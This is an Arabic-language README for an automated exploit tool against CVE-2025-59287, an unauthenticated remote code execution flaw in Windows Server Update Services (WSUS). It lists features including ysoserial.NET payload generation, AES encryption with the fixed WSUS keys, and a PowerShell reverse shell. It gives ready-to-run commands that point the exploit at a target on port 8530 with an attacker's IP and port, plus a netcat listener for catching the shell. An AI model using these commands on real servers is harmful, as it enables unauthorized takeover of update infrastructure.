
استغلال آلي لثغرة CVE-2025-59287، وهي ثغرة تنفيذ برمجيات عن بُعد (RCE) غير مصادق عليها في WSUS، تتضمن توليد الحمولة، ومستمع الصدفة العكسية، وتشفير AES بمفاتيح مضمّنة.
أداة استغلال آلية لثغرة تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليها في خادم تحديثات ويندوز (WSUS).
✅ توليد حمولة مؤتمت بالكامل
✅ تنزيل تلقائي لاعتماد ysoserial.NET
✅ مستمع شل عكسي مدمج
✅ دعم متعدد المنصات (ويندوز/لينكس/ماك)
✅ تشفير AES بمفاتيح WSUS الثابتة
✅ حمولة شل عكسي عبر PowerShell
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
استنساخ أو تنزيل ملفات الاستغلال
cd CVE-2025-59287-exploit
تشغيل الاستغلال (تنزيل تلقائي لـ ysoserial.NET)
python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
الطرفية 1: تشغيل مستمع netcat
nc -lvnp 4444
الطرفية 2: تشغيل الاستغلال بدون المستمع المدمج
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener